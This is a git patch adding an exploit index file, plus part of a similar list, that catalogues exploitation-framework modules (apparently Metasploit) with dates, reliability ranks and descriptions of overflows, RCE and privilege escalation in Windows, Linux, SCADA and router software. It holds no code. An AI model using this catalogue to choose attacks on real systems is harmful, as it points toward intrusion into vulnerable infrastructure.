windows/misc/hp_imc_dbman_restoredbase_unauth_rce 2017-05-15 excellent Yes HPE iMC dbman RestoreDBase Unauthenticated RCE - windows/misc/hp_imc_uam 2012-08-29 normal No HP Intelligent Management Center UAM Buffer Overflow - windows/misc/hp_loadrunner_magentproc 2013-07-27 normal No HP LoadRunner magentproc.exe Overflow - windows/misc/hp_loadrunner_magentproc_cmdexec 2010-05-06 excellent No HP Mercury LoadRunner Agent magentproc.exe Remote Command Execution - windows/misc/hp_magentservice 2012-01-12 average No HP Diagnostics Server magentservice.exe Overflow - windows/misc/hp_omniinet_1 2009-12-17 great Yes HP OmniInet.exe MSG_PROTOCOL Buffer Overflow - windows/misc/hp_omniinet_2 2009-12-17 great Yes HP OmniInet.exe MSG_PROTOCOL Buffer Overflow - windows/misc/hp_omniinet_3 2011-06-29 great Yes HP OmniInet.exe Opcode 27 Buffer Overflow - windows/misc/hp_omniinet_4 2011-06-29 good No HP OmniInet.exe Opcode 20 Buffer Overflow - windows/misc/hp_operations_agent_coda_34 2012-07-09 normal Yes HP Operations Agent Opcode coda.exe 0x34 Buffer Overflow - windows/misc/hp_operations_agent_coda_8c 2012-07-09 normal Yes HP Operations Agent Opcode coda.exe 0x8c Buffer Overflow - windows/misc/hp_ovtrace 2007-08-09 average No HP OpenView Operations OVTrace Buffer Overflow - windows/misc/hta_server 2016-10-06 manual No HTA Web Server - windows/misc/ib_isc_attach_database 2007-10-03 good No Borland InterBase isc_attach_database() Buffer Overflow - windows/misc/ib_isc_create_database 2007-10-03 good No Borland InterBase isc_create_database() Buffer Overflow - windows/misc/ib_svc_attach 2007-10-03 good No Borland InterBase SVC_attach() Buffer Overflow - windows/misc/ibm_cognos_tm1admsd_bof 2012-04-02 normal No IBM Cognos tm1admsd.exe Overflow - windows/misc/ibm_director_cim_dllinject 2009-03-10 excellent Yes IBM System Director Agent DLL Injection - windows/misc/ibm_tsm_cad_ping 2009-11-04 good No IBM Tivoli Storage Manager Express CAD Service Buffer Overflow - windows/misc/ibm_tsm_rca_dicugetidentify 2009-11-04 great No IBM Tivoli Storage Manager Express RCA Service Buffer Overflow - windows/misc/ibm_websphere_java_deserialize 2015-11-06 excellent No IBM WebSphere RCE Java Deserialization Vulnerability - windows/misc/itunes_extm3u_bof 2012-06-21 normal No Apple iTunes 10 Extended M3U Stack Buffer Overflow - windows/misc/landesk_aolnsrvr 2007-04-13 average No LANDesk Management Suite 8.7 Alert Service Buffer Overflow - windows/misc/lianja_db_net 2013-05-22 normal Yes Lianja SQL 1.0.0RC5.1 db_netserver Stack Buffer Overflow - windows/misc/manageengine_eventlog_analyzer_rce 2015-07-11 manual Yes ManageEngine EventLog Analyzer Remote Code Execution - windows/misc/mercury_phonebook 2005-12-19 average No Mercury/32 PH Server Module Buffer Overflow - windows/misc/mini_stream 2009-12-25 normal No Mini-Stream 3.0.1.1 Buffer Overflow - windows/misc/mirc_privmsg_server 2008-10-02 normal No mIRC PRIVMSG Handling Stack Buffer Overflow - windows/misc/ms07_064_sami 2007-12-11 normal No MS07-064 Microsoft DirectX DirectShow SAMI Buffer Overflow - windows/misc/ms10_104_sharepoint 2010-12-14 excellent Yes MS10-104 Microsoft Office SharePoint Server 2007 Remote Code Execution - windows/misc/netcat110_nt 2004-12-27 great No Netcat v1.10 NT Stack Buffer Overflow - windows/misc/nettransport 2010-01-02 normal No NetTransport Download Manager 2.90.510 Buffer Overflow - windows/misc/nvidia_mental_ray 2013-12-10 excellent No Nvidia Mental Ray Satellite Service Arbitrary DLL Injection - windows/misc/plugx 2017-07-27 normal Yes PlugX Controller Stack Overflow - windows/misc/poisonivy_21x_bof 2016-06-03 normal Yes Poison Ivy 2.1.x C2 Buffer Overflow - windows/misc/poisonivy_bof 2012-06-24 normal Yes Poison Ivy Server Buffer Overflow - windows/misc/poppeeper_date 2009-02-27 normal No POP Peeper v3.4 DATE Buffer Overflow - windows/misc/poppeeper_uidl 2009-02-27 normal No POP Peeper v3.4 UIDL Buffer Overflow - windows/misc/realtek_playlist 2008-12-16 great No Realtek Media Player Playlist Buffer Overflow - windows/misc/sap_2005_license 2009-08-01 great No SAP Business One License Manager 2005 Buffer Overflow - windows/misc/sap_netweaver_dispatcher 2012-05-08 normal No SAP NetWeaver Dispatcher DiagTraceR3Info Buffer Overflow - windows/misc/shixxnote_font 2004-10-04 great No ShixxNOTE 6.net Font Field Overflow - windows/misc/solidworks_workgroup_pdmwservice_file_write 2014-02-22 good Yes SolidWorks Workgroup PDM 2014 pdmwService.exe Arbitrary File Write - windows/misc/splayer_content_type 2011-05-04 normal No SPlayer 3.7 Content-Type Buffer Overflow - windows/misc/stream_down_bof 2011-12-27 good No CoCSoft StreamDown 6.8.0 Buffer Overflow - windows/misc/talkative_response 2009-03-17 normal No Talkative IRC v0.4.4.16 Response Buffer Overflow - windows/misc/tiny_identd_overflow 2007-05-14 average No TinyIdentD 2.2 Stack Buffer Overflow - windows/misc/trendmicro_cmdprocessor_addtask 2011-12-07 good No TrendMicro Control Manger CmdProcessor.exe Stack Buffer Overflow - windows/misc/ufo_ai 2009-10-28 average No UFO: Alien Invasion IRC Client Buffer Overflow - windows/misc/vmhgfs_webdav_dll_sideload 2016-08-05 normal No DLL Side Loading Vulnerability in VMware Host Guest Client Redirector - windows/misc/webdav_delivery 1999-01-01 manual No Serve DLL via webdav server - windows/misc/windows_rsh 2007-07-24 average No Windows RSH Daemon Buffer Overflow - windows/misc/wireshark_lua 2011-07-18 excellent No Wireshark console.lua Pre-Loading Script Execution - windows/misc/wireshark_packet_dect 2011-04-18 good No Wireshark packet-dect.c Stack Buffer Overflow - windows/mmsp/ms10_025_wmss_connect_funnel 2010-04-13 great No Windows Media Services ConnectFunnel Stack Buffer Overflow - windows/motorola/timbuktu_fileupload 2008-05-10 excellent No Timbuktu Pro Directory Traversal/File Upload - windows/mssql/lyris_listmanager_weak_pass 2005-12-08 excellent No Lyris ListManager MSDE Weak sa Password - windows/mssql/ms02_039_slammer 2002-07-24 good Yes MS02-039 Microsoft SQL Server Resolution Overflow - windows/mssql/ms02_056_hello 2002-08-05 good Yes MS02-056 Microsoft SQL Server Hello Overflow - windows/mssql/ms09_004_sp_replwritetovarbin 2008-12-09 good Yes MS09-004 Microsoft SQL Server sp_replwritetovarbin Memory Corruption - windows/mssql/ms09_004_sp_replwritetovarbin_sqli 2008-12-09 excellent Yes MS09-004 Microsoft SQL Server sp_replwritetovarbin Memory Corruption via SQL Injection - windows/mssql/mssql_clr_payload 1999-01-01 excellent Yes Microsoft SQL Server Clr Stored Procedure Payload Execution - windows/mssql/mssql_linkcrawler 2000-01-01 great No Microsoft SQL Server Database Link Crawling Command Execution - windows/mssql/mssql_payload 2000-05-30 excellent Yes Microsoft SQL Server Payload Execution - windows/mssql/mssql_payload_sqli 2000-05-30 excellent No Microsoft SQL Server Payload Execution via SQL Injection - windows/mysql/mysql_mof 2012-12-01 excellent Yes Oracle MySQL for Microsoft Windows MOF Execution - windows/mysql/mysql_start_up 2012-12-01 excellent Yes Oracle MySQL for Microsoft Windows FILE Privilege Abuse - windows/mysql/mysql_yassl_hello 2008-01-04 average No MySQL yaSSL SSL Hello Message Buffer Overflow - windows/mysql/scrutinizer_upload_exec 2012-07-27 excellent Yes Plixer Scrutinizer NetFlow and sFlow Analyzer 9 Default MySQL Credential - windows/nfs/xlink_nfsd 2006-11-06 average No Omni-NFS Server Buffer Overflow - windows/nntp/ms05_030_nntp 2005-06-14 normal No MS05-030 Microsoft Outlook Express NNTP Response Parsing Buffer Overflow - windows/novell/file_reporter_fsfui_upload 2012-11-16 great No NFR Agent FSFUI Record File Upload RCE - windows/novell/groupwisemessenger_client 2008-07-02 normal No Novell GroupWise Messenger Client Buffer Overflow - windows/novell/netiq_pum_eval 2012-11-15 excellent Yes NetIQ Privileged User Manager 2.3.1 ldapagnt_eval() Remote Perl Code Execution - windows/novell/nmap_stor 2006-12-23 average No Novell NetMail NMAP STOR Buffer Overflow - windows/novell/zenworks_desktop_agent 2005-05-19 good No Novell ZENworks 6.5 Desktop/Server Management Overflow - windows/novell/zenworks_preboot_op21_bof 2010-03-30 normal No Novell ZENworks Configuration Management Preboot Service 0x21 Buffer Overflow - windows/novell/zenworks_preboot_op4c_bof 2012-02-22 normal No Novell ZENworks Configuration Management Preboot Service 0x4c Buffer Overflow - windows/novell/zenworks_preboot_op6_bof 2010-03-30 normal No Novell ZENworks Configuration Management Preboot Service 0x06 Buffer Overflow - windows/novell/zenworks_preboot_op6c_bof 2012-02-22 normal No Novell ZENworks Configuration Management Preboot Service 0x6c Buffer Overflow - windows/oracle/client_system_analyzer_upload 2011-01-18 excellent Yes Oracle Database Client System Analyzer Arbitrary File Upload - windows/oracle/extjob 2007-01-01 excellent Yes Oracle Job Scheduler Named Pipe Command Execution - windows/oracle/osb_ndmp_auth 2009-01-14 good No Oracle Secure Backup NDMP_CONNECT_CLIENT_AUTH Buffer Overflow - windows/oracle/tns_arguments 2001-06-28 good Yes Oracle 8i TNS Listener (ARGUMENTS) Buffer Overflow - windows/oracle/tns_auth_sesskey 2009-10-20 great Yes Oracle 10gR2 TNS Listener AUTH_SESSKEY Buffer Overflow - windows/oracle/tns_service_name 2002-05-27 good Yes Oracle 8i TNS Listener SERVICE_NAME Buffer Overflow - windows/pop3/seattlelab_pass 2003-05-07 great No Seattle Lab Mail 5.5 POP3 Buffer Overflow - windows/postgres/postgres_payload 2009-04-10 excellent Yes PostgreSQL for Microsoft Windows Payload Execution - windows/proxy/bluecoat_winproxy_host 2005-01-05 great No Blue Coat WinProxy Host Header Overflow - windows/proxy/ccproxy_telnet_ping 2004-11-11 average Yes CCProxy Telnet Proxy Ping Overflow - windows/proxy/proxypro_http_get 2004-02-23 great No Proxy-Pro Professional GateKeeper 4.7 GET Request Overflow - windows/proxy/qbik_wingate_wwwproxy 2006-06-07 good Yes Qbik WinGate WWW Proxy Server URL Processing Overflow - windows/scada/abb_wserver_exec 2013-04-05 excellent Yes ABB MicroSCADA wserver.exe Remote Code Execution - windows/scada/advantech_webaccess_dashboard_file_upload 2016-02-05 excellent Yes Advantech WebAccess Dashboard Viewer uploadImageCommon Arbitrary File Upload - windows/scada/advantech_webaccess_webvrpcs_bof 2017-11-02 good No Advantech WebAccess Webvrpcs Service Opcode 80061 Stack Buffer Overflow - windows/scada/citect_scada_odbc 2008-06-11 normal No CitectSCADA/CitectFacilities ODBC Buffer Overflow - windows/scada/codesys_gateway_server_traversal 2013-02-02 excellent No SCADA 3S CoDeSys Gateway Server Directory Traversal - windows/scada/codesys_web_server 2011-12-02 normal Yes SCADA 3S CoDeSys CmpWebServer Stack Buffer Overflow - windows/scada/daq_factory_bof 2011-09-13 good No DaqFactory HMI NETB Request Overflow - windows/scada/delta_ia_commgr_bof 2018-07-02 normal No Delta Electronics Delta Industrial Automation COMMGR 1.08 Stack Buffer Overflow - windows/scada/factorylink_csservice 2011-03-25 normal No Siemens FactoryLink 8 CSService Logging Path Param Buffer Overflow - windows/scada/factorylink_vrn_09 2011-03-21 average No Siemens FactoryLink vrn.exe Opcode 9 Buffer Overflow - windows/scada/ge_proficy_cimplicity_gefebt 2014-01-23 excellent Yes GE Proficy CIMPLICITY gefebt.exe Remote Code Execution - windows/scada/iconics_genbroker 2011-03-21 good No Iconics GENESIS32 Integer Overflow Version 9.21.201.01 - windows/scada/iconics_webhmi_setactivexguid 2011-05-05 good No ICONICS WebHMI ActiveX Buffer Overflow - windows/scada/igss9_igssdataserver_listall 2011-03-24 good No 7-Technologies IGSS IGSSdataServer.exe Stack Buffer Overflow - windows/scada/igss9_igssdataserver_rename 2011-03-24 normal No 7-Technologies IGSS 9 IGSSdataServer .RMS Rename Buffer Overflow - windows/scada/igss9_misc 2011-03-24 excellent No 7-Technologies IGSS 9 Data Server/Collector Packet Handling Vulnerabilities - windows/scada/igss_exec_17 2011-03-21 excellent No Interactive Graphical SCADA System Remote Command Injection - windows/scada/indusoft_webstudio_exec 2011-11-04 excellent Yes InduSoft Web Studio Arbitrary Upload Remote Code Execution - windows/scada/moxa_mdmtool 2010-10-20 great No MOXA Device Manager Tool 2.1 Buffer Overflow - windows/scada/procyon_core_server 2011-09-08 normal Yes Procyon Core Server HMI Coreservice.exe Stack Buffer Overflow - windows/scada/realwin 2008-09-26 great No DATAC RealWin SCADA Server Buffer Overflow - windows/scada/realwin_on_fc_binfile_a 2011-03-21 great No DATAC RealWin SCADA Server 2 On_FC_CONNECT_FCS_a_FILE Buffer Overflow - windows/scada/realwin_on_fcs_login 2011-03-21 great No RealWin SCADA Server DATAC Login Buffer Overflow - windows/scada/realwin_scpc_initialize 2010-10-15 great No DATAC RealWin SCADA Server SCPC_INITIALIZE Buffer Overflow - windows/scada/realwin_scpc_initialize_rf 2010-10-15 great No DATAC RealWin SCADA Server SCPC_INITIALIZE_RF Buffer Overflow - windows/scada/realwin_scpc_txtevent 2010-11-18 great No DATAC RealWin SCADA Server SCPC_TXTEVENT Buffer Overflow - windows/scada/scadapro_cmdexe 2011-09-16 excellent No Measuresoft ScadaPro Remote Command Execution - windows/scada/sunway_force_control_netdbsrv 2011-09-22 great No Sunway Forcecontrol SNMP NetDBServer.exe Opcode 0x57 - windows/scada/winlog_runtime 2011-01-13 great No Sielco Sistemi Winlog Buffer Overflow - windows/scada/winlog_runtime_2 2012-06-04 normal No Sielco Sistemi Winlog Buffer Overflow 2.07.14 - 2.07.16 - windows/scada/yokogawa_bkbcopyd_bof 2014-03-10 normal Yes Yokogawa CENTUM CS 3000 BKBCopyD.exe Buffer Overflow - windows/scada/yokogawa_bkesimmgr_bof 2014-03-10 normal Yes Yokogawa CS3000 BKESimmgr.exe Buffer Overflow - windows/scada/yokogawa_bkfsim_vhfd 2014-05-23 normal No Yokogawa CS3000 BKFSim_vhfd.exe Buffer Overflow - windows/scada/yokogawa_bkhodeq_bof 2014-03-10 average Yes Yokogawa CENTUM CS 3000 BKHOdeq.exe Buffer Overflow - windows/sip/aim_triton_cseq 2006-07-10 great No AIM Triton 1.0.4 CSeq Buffer Overflow - windows/sip/sipxezphone_cseq 2006-07-10 great No SIPfoundry sipXezPhone 0.35a CSeq Field Overflow - windows/sip/sipxphone_cseq 2006-07-10 great No SIPfoundry sipXphone 2.6.0.27 CSeq Buffer Overflow - windows/smb/generic_smb_dll_injection 2015-03-04 manual No Generic DLL Injection From Shared Resource - windows/smb/group_policy_startup 2015-01-26 manual No Group Policy Script Execution From Shared Resource - windows/smb/ipass_pipe_exec 2015-01-21 excellent Yes IPass Control Pipe Remote Command Execution - windows/smb/ms03_049_netapi 2003-11-11 good No MS03-049 Microsoft Workstation Service NetAddAlternateComputerName Overflow - windows/smb/ms04_007_killbill 2004-02-10 low No MS04-007 Microsoft ASN.1 Library Bitstring Heap Overflow - windows/smb/ms04_011_lsass 2004-04-13 good No MS04-011 Microsoft LSASS Service DsRolerUpgradeDownlevelServer Overflow - windows/smb/ms04_031_netdde 2004-10-12 good No MS04-031 Microsoft NetDDE Service Overflow - windows/smb/ms05_039_pnp 2005-08-09 good Yes MS05-039 Microsoft Plug and Play Service Overflow - windows/smb/ms06_025_rasmans_reg 2006-06-13 good No MS06-025 Microsoft RRAS Service RASMAN Registry Overflow - windows/smb/ms06_025_rras 2006-06-13 average No MS06-025 Microsoft RRAS Service Overflow - windows/smb/ms06_040_netapi 2006-08-08 good No MS06-040 Microsoft Server Service NetpwPathCanonicalize Overflow - windows/smb/ms06_066_nwapi 2006-11-14 good No MS06-066 Microsoft Services nwapi32.dll Module Exploit - windows/smb/ms06_066_nwwks 2006-11-14 good No MS06-066 Microsoft Services nwwks.dll Module Exploit - windows/smb/ms06_070_wkssvc 2006-11-14 manual No MS06-070 Microsoft Workstation Service NetpManageIPCConnect Overflow - windows/smb/ms07_029_msdns_zonename 2007-04-12 manual No MS07-029 Microsoft DNS RPC Service extractQuotedChar() Overflow (SMB) - windows/smb/ms08_067_netapi 2008-10-28 great Yes MS08-067 Microsoft Server Service Relative Path Stack Corruption - windows/smb/ms09_050_smb2_negotiate_func_index 2009-09-07 good No MS09-050 Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference - windows/smb/ms10_046_shortcut_icon_dllloader 2010-07-16 excellent No Microsoft Windows Shell LNK Code Execution - windows/smb/ms10_061_spoolss 2010-09-14 excellent No MS10-061 Microsoft Print Spooler Service Impersonation Vulnerability - windows/smb/ms15_020_shortcut_icon_dllloader 2015-03-10 excellent No Microsoft Windows Shell LNK Code Execution - windows/smb/ms17_010_eternalblue 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption - windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+ - windows/smb/ms17_010_psexec 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution - windows/smb/netidentity_xtierrpcpipe 2009-04-06 great No Novell NetIdentity Agent XTIERRPCPIPE Named Pipe Buffer Overflow - windows/smb/psexec 1999-01-01 manual No Microsoft Windows Authenticated User Code Execution - windows/smb/psexec_psh 1999-01-01 manual No Microsoft Windows Authenticated Powershell Command Execution - windows/smb/smb_delivery 2016-07-26 excellent No SMB Delivery - windows/smb/smb_relay 2001-03-31 excellent No MS08-068 Microsoft Windows SMB Relay Code Execution - windows/smb/timbuktu_plughntcommand_bof 2009-06-25 great No Timbuktu PlughNTCommand Named Pipe Buffer Overflow - windows/smb/webexec 2018-10-24 manual No WebExec Authenticated User Code Execution - windows/smtp/mailcarrier_smtp_ehlo 2004-10-26 good Yes TABS MailCarrier v2.51 SMTP EHLO Overflow - windows/smtp/mercury_cram_md5 2007-08-18 great No Mercury Mail SMTP AUTH CRAM-MD5 Buffer Overflow - windows/smtp/ms03_046_exchange2000_xexch50 2003-10-15 good Yes MS03-046 Exchange 2000 XEXCH50 Heap Overflow - windows/smtp/njstar_smtp_bof 2011-10-31 normal Yes NJStar Communicator 3.00 MiniSMTP Buffer Overflow - windows/smtp/sysgauge_client_bof 2017-02-28 normal No SysGauge SMTP Validation Buffer Overflow - windows/smtp/wmailserver 2005-07-11 average No SoftiaCom WMailserver 1.0 Buffer Overflow - windows/smtp/ypops_overflow1 2004-09-27 average Yes YPOPS 0.6 Buffer Overflow - windows/ssh/freeftpd_key_exchange 2006-05-12 average No FreeFTPd 1.0.10 Key Exchange Algorithm String Buffer Overflow - windows/ssh/freesshd_authbypass 2010-08-11 excellent Yes Freesshd Authentication Bypass - windows/ssh/freesshd_key_exchange 2006-05-12 average No FreeSSHd 1.0.9 Key Exchange Algorithm String Buffer Overflow - windows/ssh/putty_msg_debug 2002-12-16 normal No PuTTY Buffer Overflow - windows/ssh/securecrt_ssh1 2002-07-23 average No SecureCRT SSH1 Buffer Overflow - windows/ssh/sysax_ssh_username 2012-02-27 normal Yes Sysax 5.53 SSH Username Buffer Overflow - windows/ssl/ms04_011_pct 2004-04-13 average No MS04-011 Microsoft Private Communications Transport Overflow - windows/telnet/gamsoft_telsrv_username 2000-07-17 average Yes GAMSoft TelSrv 1.5 Username Buffer Overflow - windows/telnet/goodtech_telnet 2005-03-15 average No GoodTech Telnet Server Buffer Overflow - windows/tftp/attftp_long_filename 2006-11-27 average No Allied Telesyn TFTP Server 1.9 Long Filename Overflow - windows/tftp/distinct_tftp_traversal 2012-04-08 excellent No Distinct TFTP 3.10 Writable Directory Traversal Execution - windows/tftp/dlink_long_filename 2007-03-12 good No D-Link TFTP 1.0 Long Filename Buffer Overflow - windows/tftp/futuresoft_transfermode 2005-05-31 average No FutureSoft TFTP Server 2000 Transfer-Mode Overflow - windows/tftp/netdecision_tftp_traversal 2009-05-16 excellent No NetDecision 4.2 TFTP Writable Directory Traversal Execution - windows/tftp/opentftp_error_code 2008-07-05 average No OpenTFTP SP 1.4 Error Packet Overflow - windows/tftp/quick_tftp_pro_mode 2008-03-27 good No Quick FTP Pro 2.1 Transfer-Mode Overflow - windows/tftp/tftpd32_long_filename 2002-11-19 average No TFTPD32 Long Filename Buffer Overflow - windows/tftp/tftpdwin_long_filename 2006-09-21 great No TFTPDWIN v0.4.2 Long Filename Buffer Overflow - windows/tftp/tftpserver_wrq_bof 2008-03-26 normal No TFTP Server for Windows 1.4 ST WRQ Buffer Overflow - windows/tftp/threectftpsvc_long_mode 2006-11-27 great No 3CTftpSvc TFTP Long Mode Buffer Overflow - windows/unicenter/cam_log_security 2005-08-22 great Yes CA CAM log_security() Stack Buffer Overflow (Win32) - windows/vnc/realvnc_client 2001-01-29 normal No RealVNC 3.3.7 Client Buffer Overflow - windows/vnc/ultravnc_client 2006-04-04 normal No UltraVNC 1.0.1 Client Buffer Overflow - windows/vnc/ultravnc_viewer_bof 2008-02-06 normal No UltraVNC 1.0.2 Client (vncviewer.exe) Buffer Overflow - windows/vnc/winvnc_http_get 2001-01-29 average No WinVNC Web Server GET Overflow - windows/vpn/safenet_ike_11 2009-06-01 average No SafeNet SoftRemote IKE Service Buffer Overflow - windows/winrm/winrm_script_exec 2012-11-01 manual No WinRM Script Exec Remote Code Execution - windows/wins/ms04_045_wins 2004-12-14 great Yes MS04-045 Microsoft WINS Service Memory Overwrite From 5181d6e2c7de8820a9a32a7f3a468c5fe8dddd8e Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Sat, 6 Apr 2019 11:49:57 -0500 Subject: [PATCH 085/214] Add files via upload --- tools/exploits.txt | 1876 ++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 1876 insertions(+) create mode 100644 tools/exploits.txt diff --git a/tools/exploits.txt b/tools/exploits.txt new file mode 100644 index 0000000..24da764 --- /dev/null +++ b/tools/exploits.txt @@ -0,0 +1,1876 @@ +Exploits +======== + + Name Disclosure Date Rank Check Description + ---- --------------- ---- ----- ----------- + aix/local/ibstat_path 2013-09-24 excellent Yes ibstat $PATH Privilege Escalation + aix/rpc_cmsd_opcode21 2009-10-07 great No AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 Buffer Overflow + aix/rpc_ttdbserverd_realpath 2009-06-17 great No ToolTalk rpc.ttdbserverd _tt_internal_realpath Buffer Overflow (AIX) + android/adb/adb_server_exec 2016-01-01 excellent Yes Android ADB Debug Server Remote Payload Execution + android/browser/samsung_knox_smdm_url 2014-11-12 excellent No Samsung Galaxy KNOX Android Browser RCE + android/browser/stagefright_mp4_tx3g_64bit 2015-08-13 normal No Android Stagefright MP4 tx3g Integer Overflow + android/browser/webview_addjavascriptinterface 2012-12-21 excellent No Android Browser and WebView addJavascriptInterface Code Execution + android/fileformat/adobe_reader_pdf_js_interface 2014-04-13 good No Adobe Reader for Android addJavascriptInterface Exploit + android/local/futex_requeue 2014-05-03 excellent No Android 'Towelroot' Futex Requeue Kernel Exploit + android/local/put_user_vroot 2013-09-06 excellent No Android get_user/put_user Exploit + android/local/su_exec 2017-08-31 manual No Android 'su' Privilege Escalation + apple_ios/browser/safari_libtiff 2006-08-01 good No Apple iOS MobileSafari LibTIFF Buffer Overflow + apple_ios/browser/webkit_trident 2016-08-25 manual No WebKit not_number defineProperties UAF + apple_ios/email/mobilemail_libtiff 2006-08-01 good No Apple iOS MobileMail LibTIFF Buffer Overflow + apple_ios/ssh/cydia_default_ssh 2007-07-02 excellent No Apple iOS Default SSH Password Vulnerability + bsd/finger/morris_fingerd_bof 1988-11-02 normal Yes Morris Worm fingerd Stack Buffer Overflow + bsdi/softcart/mercantec_softcart 2004-08-19 great No Mercantec SoftCart CGI Overflow + dialup/multi/login/manyargs 2001-12-12 good No System V Derived /bin/login Extraneous Arguments Buffer Overflow + firefox/local/exec_shellcode 2014-03-10 excellent No Firefox Exec Shellcode from Privileged Javascript Shell + freebsd/ftp/proftp_telnet_iac 2010-11-01 great Yes ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (FreeBSD) + freebsd/http/watchguard_cmd_exec 2015-06-29 excellent Yes Watchguard XCS Remote Command Execution + freebsd/local/intel_sysret_priv_esc 2012-06-12 great Yes FreeBSD Intel SYSRET Privilege Escalation + freebsd/local/mmap 2013-06-18 great Yes FreeBSD 9 Address Space Manipulation Privilege Escalation + freebsd/local/watchguard_fix_corrupt_mail 2015-06-29 manual Yes Watchguard XCS FixCorruptMail Local Privilege Escalation + freebsd/misc/citrix_netscaler_soap_bof 2014-09-22 normal Yes Citrix NetScaler SOAP Handler Remote Code Execution + freebsd/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (*BSD x86) + freebsd/tacacs/xtacacsd_report 2008-01-08 average No XTACACSD report() Buffer Overflow + freebsd/telnet/telnet_encrypt_keyid 2011-12-23 great No FreeBSD Telnet Service Encryption Key ID Buffer Overflow + hpux/lpd/cleanup_exec 2002-08-28 excellent No HP-UX LPD Command Execution + irix/lpd/tagprinter_exec 2001-09-01 excellent Yes Irix LPD tagprinter Command Execution + linux/antivirus/escan_password_exec 2014-04-04 excellent Yes eScan Web Management Console Command Injection + linux/browser/adobe_flashplayer_aslaunch 2008-12-17 good No Adobe Flash Player ActionScript Launch Command Execution Vulnerability + linux/ftp/proftp_sreplace 2006-11-26 great Yes ProFTPD 1.2 - 1.3.0 sreplace Buffer Overflow (Linux) + linux/ftp/proftp_telnet_iac 2010-11-01 great Yes ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (Linux) + linux/games/ut2004_secure 2004-06-18 good Yes Unreal Tournament 2004 "secure" Overflow (Linux) + linux/http/accellion_fta_getstatus_oauth 2015-07-10 excellent Yes Accellion FTA getStatus verify_oauth_token Command Execution + linux/http/advantech_switch_bash_env_exec 2015-12-01 excellent Yes Advantech Switch Bash Environment Variable Code Injection (Shellshock) + linux/http/airties_login_cgi_bof 2015-03-31 normal Yes Airties login-cgi Buffer Overflow + linux/http/alcatel_omnipcx_mastercgi_exec 2007-09-09 manual No Alcatel-Lucent OmniPCX Enterprise masterCGI Arbitrary Command Execution + linux/http/alienvault_exec 2017-01-31 excellent Yes AlienVault OSSIM/USM Remote Code Execution + linux/http/alienvault_sqli_exec 2014-04-24 excellent Yes AlienVault OSSIM SQL Injection and Remote Code Execution + linux/http/apache_continuum_cmd_exec 2016-04-06 excellent Yes Apache Continuum Arbitrary Command Execution + linux/http/apache_couchdb_cmd_exec 2016-04-06 excellent Yes Apache CouchDB Arbitrary Command Execution + linux/http/astium_sqli_upload 2013-09-17 manual Yes Astium Remote Code Execution + linux/http/asuswrt_lan_rce 2018-01-22 excellent No AsusWRT LAN Unauthenticated Remote Code Execution + linux/http/atutor_filemanager_traversal 2016-03-01 excellent Yes ATutor 2.2.1 Directory Traversal / Remote Code Execution + linux/http/axis_srv_parhand_rce 2018-06-18 excellent Yes Axis Network Camera .srv to parhand RCE + linux/http/belkin_login_bof 2014-05-09 normal Yes Belkin Play N750 login.cgi Buffer Overflow + linux/http/centreon_sqli_exec 2014-10-15 excellent Yes Centreon SQL and Command Injection + linux/http/centreon_useralias_exec 2016-02-26 excellent Yes Centreon Web Useralias Command Execution + linux/http/cfme_manageiq_evm_upload_exec 2013-09-04 excellent Yes Red Hat CloudForms Management Engine 5.1 agent/linuxpkgs Path Traversal + linux/http/cisco_firepower_useradd 2016-10-10 excellent Yes Cisco Firepower Management Console 6.0 Post Authentication UserAdd Vulnerability + linux/http/cisco_prime_inf_rce 2018-10-04 excellent Yes Cisco Prime Infrastructure Unauthenticated Remote Code Execution + linux/http/crypttech_cryptolog_login_exec 2017-05-03 excellent Yes Crypttech CryptoLog Remote Code Execution + linux/http/dcos_marathon 2017-03-03 excellent Yes DC/OS Marathon UI Docker Exploit + linux/http/ddwrt_cgibin_exec 2009-07-20 excellent No DD-WRT HTTP Daemon Arbitrary Command Execution + linux/http/denyall_waf_exec 2017-09-19 excellent Yes DenyAll Web Application Firewall Remote Code Execution + linux/http/dlink_authentication_cgi_bof 2013-02-08 normal Yes D-Link authentication.cgi Buffer Overflow + linux/http/dlink_command_php_exec_noauth 2013-02-04 excellent No D-Link Devices Unauthenticated Remote Command Execution + linux/http/dlink_dcs931l_upload 2015-02-23 great Yes D-Link DCS-931L File Upload + linux/http/dlink_dcs_930l_authenticated_remote_command_execution 2015-12-20 excellent No D-Link DCS-930L Authenticated Remote Command Execution + linux/http/dlink_diagnostic_exec_noauth 2013-03-05 excellent No D-Link DIR-645 / DIR-815 diagnostic.php Command Execution + linux/http/dlink_dir300_exec_telnet 2013-04-22 excellent No D-Link Devices Unauthenticated Remote Command Execution + linux/http/dlink_dir605l_captcha_bof 2012-10-08 manual Yes D-Link DIR-605L Captcha Handling Buffer Overflow + linux/http/dlink_dir615_up_exec 2013-02-07 excellent No D-Link DIR615h OS Command Injection + linux/http/dlink_dir850l_unauth_exec 2017-08-09 excellent Yes DIR-850L (Un)authenticated OS Command Exec + linux/http/dlink_dsl2750b_exec_noauth 2016-02-05 great Yes D-Link DSL-2750B OS Command Injection + linux/http/dlink_dspw110_cookie_noauth_exec 2015-06-12 normal Yes D-Link Cookie Command Execution + linux/http/dlink_dspw215_info_cgi_bof 2014-05-22 normal Yes D-Link info.cgi POST Request Buffer Overflow + linux/http/dlink_hedwig_cgi_bof 2013-02-08 normal Yes D-Link hedwig.cgi Buffer Overflow in Cookie Header + linux/http/dlink_hnap_bof 2014-05-15 normal Yes D-Link HNAP Request Remote Buffer Overflow + linux/http/dlink_hnap_header_exec_noauth 2015-02-13 normal Yes D-Link Devices HNAP SOAPAction-Header Command Execution + linux/http/dlink_hnap_login_bof 2016-11-07 excellent Yes Dlink DIR Routers Unauthenticated HNAP Login Stack Buffer Overflow + linux/http/dlink_upnp_exec_noauth 2013-07-05 normal Yes D-Link Devices UPnP SOAP Command Execution + 